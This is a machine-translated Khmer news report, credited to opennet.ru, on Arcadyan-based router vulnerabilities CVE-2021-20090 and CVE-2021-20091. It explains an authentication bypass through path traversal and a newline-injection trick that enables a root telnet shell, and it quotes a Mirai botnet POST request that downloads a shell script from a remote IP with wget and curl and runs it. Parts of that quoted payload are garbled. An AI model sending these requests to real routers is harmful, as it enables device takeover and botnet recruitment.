🥇Vulnerability in home routers គ្របដណ្តប់ក្រុមហ៊ុនផលិត 17

ការវាយប្រហារដ៏ធំមួយត្រូវបានកត់ត្រានៅលើបណ្តាញប្រឆាំងនឹងរ៉ោតទ័រផ្ទះដែលកម្មវិធីបង្កប់ប្រើប្រាស់ការប្រតិបត្តិម៉ាស៊ីនមេ HTTP ពីក្រុមហ៊ុន Arcadyan ។ ដើម្បីទទួលបានការគ្រប់គ្រងលើឧបករណ៍ ការរួមបញ្ចូលគ្នានៃភាពងាយរងគ្រោះពីរត្រូវបានប្រើដែលអនុញ្ញាតឱ្យប្រតិបត្តិពីចម្ងាយនៃកូដបំពានជាមួយនឹងសិទ្ធិជា root ។ បញ្ហានេះប៉ះពាល់ដល់រ៉ោតទ័រ ADSL ជាច្រើនពី Arcadyan, ASUS និង Buffalo ក៏ដូចជាឧបករណ៍ដែលផ្គត់ផ្គង់ក្រោមម៉ាក Beeline (បញ្ហាត្រូវបានបញ្ជាក់នៅក្នុង Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone និង ប្រតិបត្តិករទូរគមនាគមន៍ផ្សេងទៀត។ វាត្រូវបានកត់សម្គាល់ថាបញ្ហាមានវត្តមាននៅក្នុងកម្មវិធីបង្កប់ Arcadyan អស់រយៈពេលជាង 10 ឆ្នាំមកហើយហើយក្នុងអំឡុងពេលនេះគាត់បានគ្រប់គ្រងដើម្បីផ្លាស់ប្តូរទៅយ៉ាងហោចណាស់ 20 ម៉ូដែលឧបករណ៍ពីក្រុមហ៊ុនផលិត 17 ផ្សេងគ្នា។

ភាពងាយរងគ្រោះទីមួយ CVE-2021-20090 ធ្វើឱ្យវាអាចចូលប្រើស្គ្រីបចំណុចប្រទាក់គេហទំព័រណាមួយដោយមិនចាំបាច់មានការផ្ទៀងផ្ទាត់។ ខ្លឹមសារនៃភាពងាយរងគ្រោះគឺថានៅក្នុងចំណុចប្រទាក់បណ្ដាញ ថតមួយចំនួនដែលរូបភាព ឯកសារ CSS និងស្គ្រីប JavaScript ត្រូវបានផ្ញើគឺអាចចូលប្រើបានដោយមិនចាំបាច់មានការផ្ទៀងផ្ទាត់។ ក្នុងករណីនេះ ថតដែលការចូលប្រើដោយគ្មានការផ្ទៀងផ្ទាត់ត្រូវបានអនុញ្ញាតត្រូវបានពិនិត្យដោយប្រើរបាំងដំបូង។ ការបញ្ជាក់តួអក្សរ “../” នៅក្នុងផ្លូវដើម្បីទៅកាន់ថតមេត្រូវបានរារាំងដោយកម្មវិធីបង្កប់ ប៉ុន្តែការប្រើបន្សំ “..%2f” ត្រូវបានរំលង។ ដូច្នេះ វាអាចទៅរួចក្នុងការបើកទំព័រដែលបានការពារនៅពេលផ្ញើសំណើដូចជា “http://192.168.1.1/images/..%2findex.htm”។

ភាពងាយរងគ្រោះទីពីរ CVE-2021-20091 អនុញ្ញាតឱ្យអ្នកប្រើប្រាស់ដែលផ្ទៀងផ្ទាត់ភាពត្រឹមត្រូវធ្វើការផ្លាស់ប្តូរការកំណត់ប្រព័ន្ធរបស់ឧបករណ៍ដោយផ្ញើប៉ារ៉ាម៉ែត្រដែលបានធ្វើទ្រង់ទ្រាយពិសេសទៅកាន់ស្គ្រីប apply_abstract.cgi ដែលមិនពិនិត្យមើលវត្តមាននៃតួអក្សរបន្ទាត់ថ្មីនៅក្នុងប៉ារ៉ាម៉ែត្រ . ឧទាហរណ៍ នៅពេលអនុវត្តប្រតិបត្តិការ ping អ្នកវាយប្រហារអាចបញ្ជាក់តម្លៃ “192.168.1.2%0AARC_SYS_TelnetdEnable=1” នៅក្នុងវាលដែលមានអាសយដ្ឋាន IP កំពុងត្រូវបានពិនិត្យ និងស្គ្រីប នៅពេលបង្កើតឯកសារការកំណត់ /tmp/etc/config/ .glbcfg នឹងសរសេរបន្ទាត់ “AARC_SYS_TelnetdEnable=1” ទៅក្នុងវា” ដែលធ្វើឲ្យម៉ាស៊ីនមេ telnetd សកម្ម ដែលផ្តល់នូវការចូលប្រើសែលពាក្យបញ្ជាដែលមិនមានការរឹតបន្តឹងជាមួយនឹងសិទ្ធិជា root ។ ដូចគ្នានេះដែរ ដោយកំណត់ប៉ារ៉ាម៉ែត្រ AARC_SYS អ្នកអាចប្រតិបត្តិកូដណាមួយនៅលើប្រព័ន្ធ។ ភាពងាយរងគ្រោះដំបូងធ្វើឱ្យវាអាចដំណើរការស្គ្រីបដែលមានបញ្ហាដោយគ្មានការផ្ទៀងផ្ទាត់ដោយចូលទៅកាន់វាជា “/images/..%2fapply_abstract.cgi”។

ដើម្បីទាញយកភាពងាយរងគ្រោះ អ្នកវាយប្រហារត្រូវតែអាចផ្ញើសំណើទៅកាន់ច្រកបណ្តាញដែលចំណុចប្រទាក់បណ្ដាញកំពុងដំណើរការ។ ដោយវិនិច្ឆ័យដោយសក្ដានុពលនៃការរីករាលដាលនៃការវាយប្រហារ ប្រតិបត្តិករជាច្រើនចាកចេញពីការចូលប្រើឧបករណ៍របស់ពួកគេពីបណ្តាញខាងក្រៅ ដើម្បីសម្រួលការវិនិច្ឆ័យបញ្ហាដោយសេវាកម្មគាំទ្រ។ ប្រសិនបើការចូលទៅកាន់ចំណុចប្រទាក់ត្រូវបានកំណត់សម្រាប់តែបណ្តាញខាងក្នុង ការវាយប្រហារអាចត្រូវបានអនុវត្តពីបណ្តាញខាងក្រៅដោយប្រើបច្ចេកទេស "ការភ្ជាប់ DNS" ។ ភាពងាយរងគ្រោះត្រូវបានប្រើប្រាស់យ៉ាងសកម្មដើម្បីភ្ជាប់រ៉ោតទ័រទៅកាន់ Mirai botnet៖ POST /images/..%2fapply_abstract.cgi HTTP/1.1 ការតភ្ជាប់៖ បិទ User-Agent៖ Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7.ipad 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

ប្រភព: opennet.ru

ភាពងាយរងគ្រោះនៅក្នុង Router ក្នុងផ្ទះប៉ះពាល់ដល់ក្រុមហ៊ុនផលិតចំនួន 17

បន្ថែមមតិយោបល់ ответОтменить